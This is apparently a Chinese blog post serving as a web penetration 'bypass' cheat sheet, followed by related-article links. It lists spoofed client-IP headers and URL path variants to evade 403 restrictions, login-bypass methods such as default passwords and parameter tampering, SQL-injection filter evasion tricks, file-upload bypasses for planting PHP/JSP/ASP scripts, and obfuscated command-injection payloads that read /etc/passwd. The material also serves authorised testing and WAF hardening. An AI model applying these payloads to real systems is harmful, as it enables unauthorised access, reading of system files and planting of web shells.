web渗透绕过
////目录:
403 IP地址绕过与文件名绕过
登录框绕过
SQL注入绕过
文件上传绕过
RCE绕过
403 IP地址绕过与文件名绕过
X-Forwarded-For:127.0.0.1
X-Forwarded:127.0.0.1
Forwarded-For:127.0.0.1
Forwarded:127.0.0.1
X-Forwarded-Host:127.0.0.1
X-remote-IP:127.0.0.1
X-remote-addr:127.0.0.1
True-Client-IP:127.0.0.1
X-Client-IP:127.0.0.1
Client-IP:127.0.0.1
X-Real-IP:127.0.0.1
Ali-CDN-Real-IP:127.0.0.1
Cdn-Src-Ip:127.0.0.1
Cdn-Real-Ip:127.0.0.1
CF-Connecting-IP:127.0.0.1
X-Cluster-Client-IP:127.0.0.1
WL-Proxy-Client-IP:127.0.0.1
Proxy-Client-IP:127.0.0.1
Fastly-Client-Ip:127.0.0.1
True-Client-Ip:127.0.0.1
site.com/admin => 403
site.com/admin/ => 200
site.com/admin// => 200
site.com//admin// => 200
site.com/admin/* => 200
site.com/admin/*/ => 200
site.com/admin/. => 200
site.com/admin/./ => 200
site.com/./admin/./ => 200
site.com/admin/./. => 200
site.com/admin/./. => 200
site.com/admin? => 200
site.com/admin?? => 200
site.com/admin??? => 200
site.com/admin..;/ => 200
site.com/admin/..;/ => 200
site.com/%2f/admin => 200
site.com/%2e/admin => 200
site.com/admin%20/ => 200
site.com/admin%09/ => 200
site.com/%20admin%20/ => 200
登录框绕过
1.网络嗅探
通过网络嗅探工具探测局域网中传输的明文用户名和密码。有些应用程序采用GET方式发送登录请求,可能导致GET的URL请求内容被缓存在代理服务器或者Web服务器端,导致用户名和密码泄漏
2.默认或可猜测的用户账号
大多数开源软件或商业软件提供的基于网络配置和管理的接口,通常都会有一些默认的用户名和密码。
例如,一般默认的用户名是:
admin、administrator、root、system、guest等,而默认的密码也根据硬件和软件的不同而不同,可尝试一下这些密码:
password、admin、guest、12345等
3.直接访问内部URL
使用Spider工具找到含有
admin、manager、login、administrator等词语的路径,尝试使用普通的登录用户访问这些URL,从而获得管理员的权限
4.修改参数绕过认证
应用程序可能会使用一个参数或一个隐藏的域表示一个用户是否经过了验证。通过修改这些参数,从而被认为是已经认证过的用户
例如:
http://www.xxx.xom/userinfo.jsp?authenticated=no
通过修改authenticated参数为yes,
http://www.xxx.xom/userinfo.jsp?authenticated=yes
然后就可以通过认证,直接访问内部页面。
5.可猜测的SessionID
利用规律,猜测到一个有效的SessionID,然后通过修改请求中的SessionID为一个预测到的有效SessionID,从而冒充会话的真正拥有者,绕过认证环节。
6.注入问题
利用万能密码登录系统,绕过认证环节
7.CSRF
利用CSRF漏洞在用户不知情的情况下,利用用户的会话进行敏感操作,从而绕过认证
SQL注入绕过
0.大小写混用
SeLect
1.Url编码
2.16进制编码
3.distinct绕过
过滤union select 使用 union distinct select
4.select'1'绕过
过滤select空格,select后面的参数用引号包裹
例如: select'1'
5.科学计数法绕过
过滤空格from,和from挨着的参数,使用科学计数法
例如:3e0from
6.{}绕过
过滤from空格,from{x 表名}
例如:3e0from{x user}
7.过滤注释符号 / * - #
调整payload在适当位置加括号,可以不需要注释
8.注释绕过
/*!select*/
9. 双写绕过
SEselectLECT
10.符号绕过
过滤 or and xor not ,使用 && || |# |
11.大小于号绕过
过滤 = 可以使用大小于号 <>
12.greatest绕过
过滤大小于号,使用greatest(n1,n2,nx)返回n中的最大值,使用least返回n中的最小值
13.strcmp绕过
strcmp(str1,str2):若所有的字符串均相同,则返回STRCMP()若根据当前分类次序,第一个参数小于第二个,则返回 -1,其它情况返回 1
文件上传绕过
1.js绕过
可以修改网页源代码,或者直接禁用js进行上传
2.黑名单绕过
可以上传例如php1,php2,phtml等文件
3.抓包绕过
上传1.jpg,在burp中修改回php再上传
4.双写绕过
有的waf会判断你的后缀名是否符合规定,例如1.php,这时候waf会删除php,我们改为上传1.phpphp
5.截断绕过
例如00截断等
6.解析绕过
上传1.jpg,利用目录解析或者文件包含进行解析,或者上传 .htacess 等文件
7.条件竞争绕过
上传1.php文件,利用bp抓包,设置多线程,不断发包;
浏览器访问连接我们上传的1.php文件;
不断刷新,会在某瞬间,执行1.php成功。
8.::$DATA绕黑名单
文件名 .jsp::$DATA
9.后缀绕过
asp: aspx asa asax ascx ashx asmx cer aSp
php: php2 php3 php4 php5 phtml pht html pHp
jsp: jspa jspx jsw jsv jspf jtml jSp
RCE绕过
cmd1 | cmd2 只执行cmd2
cmd1 || cmd2 只有当cmd1执行失败后,cmd2才被执行
cmd1 & cmd2 先执行cmd1,不管是否成功,都会执行cmd2
cmd1 && cmd2 先执行cmd1,cmd1执行成功后才执行cmd2,否则不执行cmd2
(Linux还支持分号 ; )cmd1;cmd2 按顺序依次执行,先执行cmd1再执行cmd2
1.变量绕过
a=c;b=a;c=t;
$a$b$c /etc/passwd
2.16编码绕过
"\x73\x79\x73\x74\x65\x6d"("cat /etc/passwd");
3.oct编码绕过
$(printf "\154\163")//ls命令
4.拼接绕过
sy.(st).em)(whoami);
c''a''t /etc/passwd//单引
c""a""t /etc/passwd//双引
c``a``t /etc/passwd/反单引
c\a\t /etc/passwd//反斜线
$*和$@,$x(x代表1-9),${x}(x>=10)
比如 ca${21}t a.txt 表示 cat a.txt 在没有传入参数的情况下,这些特殊字符默认为空,如下:
wh$1oami
who$@ami
whoa$*mi
5.利用未赋值变量绕过
cat /etc$u/passwd
cat$u /etc/passwd
6.通配符绕过
cat /passwd:
??? /e??/?a????
cat /e*/pa*
web渗透绕过的更多相关文章
- Kali Linux Web 渗透测试视频教程—第十一课-扫描、sql注入、上传绕过
Kali Linux Web 渗透测试视频教程—第十一课-扫描.sql注入.上传绕过 文/玄魂 原文链接:http://www.xuanhun521.com/Blog/2014/10/25/kali- ...
- Kali Linux 秘籍/Web渗透秘籍/无线渗透入门
Kali Linux 秘籍 原书:Kali Linux Cookbook 译者:飞龙 在线阅读 PDF格式 EPUB格式 MOBI格式 Github Git@OSC 目录: 第一章 安装和启动Kali ...
- Kali学习笔记23:Web渗透简介
文章的格式也许不是很好看,也没有什么合理的顺序 完全是想到什么写一些什么,但各个方面都涵盖到了 能耐下心看的朋友欢迎一起学习,大牛和杠精们请绕道 我这里先说几句: 其实从缓冲区溢出到Web渗透之间还有 ...
- 2017-2018-2 20155303『网络对抗技术』Final:Web渗透获取WebShell权限
2017-2018-2 『网络对抗技术』Final:Web渗透获取WebShell权限 --------CONTENTS-------- 一.Webshell原理 1.什么是WebShell 2.We ...
- Kali Linux Web渗透测试手册(第二版) - 1.3 - 靶机的安装
Kali Linux Web渗透测试手册(第二版) - 1.3 - 靶机的安装 一.配置KALI Linux和渗透测试环境 在这一章,我们将覆盖以下内容: 在Windows和Linux上安装Virt ...
- Kali Linux Web渗透测试手册(第二版) - 1.1 - Firefox浏览器下安装一些常用的插件
一.配置KALI Linux和渗透测试环境 在这一章,我们将覆盖以下内容: l 在Windows和Linux上安装VirtualBox l 创建一个Kali Linux虚拟机 l 更新和升级Ka ...
- AssassinGo: 基于Go的高并发可拓展式Web渗透框架
转载自FreeBuf.COM AssassinGo是一款使用Golang开发,集成了信息收集.基础攻击探测.Google-Hacking域名搜索和PoC批量检测等功能的Web渗透框架,并且有着基于Vu ...
- Web渗透测试漏洞手册及修复建议
Web渗透测试漏洞手册及修复建议 0x0 配置管理 0x01 HTTP方法测试 漏洞介绍: 目标服务器启用了不安全的传输方法,如PUT.DELETE等,这些方法表示可能在服务器上使用了 WebDAV, ...
- 转载过来的参考内容---常规36个WEB渗透测试漏洞描述及修复方法----很详细
常规WEB渗透测试漏洞描述及修复 --转自:http://www.51testing.com/html/92/n-3723692.html (1). Apache样例文件泄漏 漏洞描述 apa ...
随机推荐
- 基于华为云服务器的FTP站点搭建
前言 主要介绍了华为云上如何使用弹性云服务器的Linux实例使用vsftpd软件搭建FTP站点.vsftpd全称是"very secure FTP daemon",是一款在Linu ...
- JVM完整详解:内存分配+运行原理+回收算法+GC参数等
不管是BAT面试,还是工作实践中的JVM调优以及参数设置,或者内存溢出检测等,都需要涉及到Java虚拟机的内存模型.内存分配,以及回收算法机制等,这些都是必考.必会技能. JVM内存模型 JVM内存模 ...
- 神坑!为什么prometheus的pushgateway不能对上报的counter进行累加?
部署了一个prometheus的pushgateway,然后两次对其发送counter类型的数据: #第一次发送 curl -X POST -d '# TYPE my_first_metric_ahf ...
- 1000粉!使用Three.js制作一个专属3D奖牌🥇
背景 破防了 !突然发现 SegmentFault 平台的粉丝数量已经突破 1000 了,它是我的三个博客平台掘金.博客园.SegmentFault中首个粉丝突破 1000 的,于是设计开发这个页面, ...
- netty基础知识
参考 http://www.infoq.com/cn/articles/netty-high-performance 1. 传统 RPC 调用性能差的三宗罪 1)网络传输方式问题 2)序列化方式问题 ...
- 多线程(Thread类中的方法线程名称)
1 package multithread; 2 3 /* 4 * 如何创建一个线程呢? 5 * 6 * 创建线程方式一:继承Thread类. 7 * 8 * 步骤: 9 * 1,定义一个类继承Thr ...
- linux文件压缩与文件夹压缩(打包)
目录 一:linux文件压缩 1.linux常见的压缩包有哪些? 2.bzip压缩(文件) 二:打包(文件夹压缩) 1.打包命令 2.参数 3.参数解析(实战) 4.注意事项 简介: win中的压缩包 ...
- python语法缩进
1.python会根据缩进来判断代码行和前一句代码行之间的关系 2.for循环后一定要缩进,for循环后面的冒号代表告诉python,下面是代码行缩进的第一行
- 微服务架构 | 5.1 使用 Netflix Hystrix 断路器
目录 前言 1. Hystrix 基础知识 1.1 Hystrix 断路器强调调用 1.2 两大类别的 Hystrix 实现 1.3 舱壁策略 1.4 Hystrix 在远程资源调用失败时的决策过程 ...
- Android开发-资源导入
安卓开发首先要导入开发资源,这些资源包括图片,图标等,方便开发过程中的使用 我是跟着b站博主做的记账本app所以导入的资源也来自于网络 将资源导入到res文件夹下这里面包括颜色资源,布局资源,图片资源 ...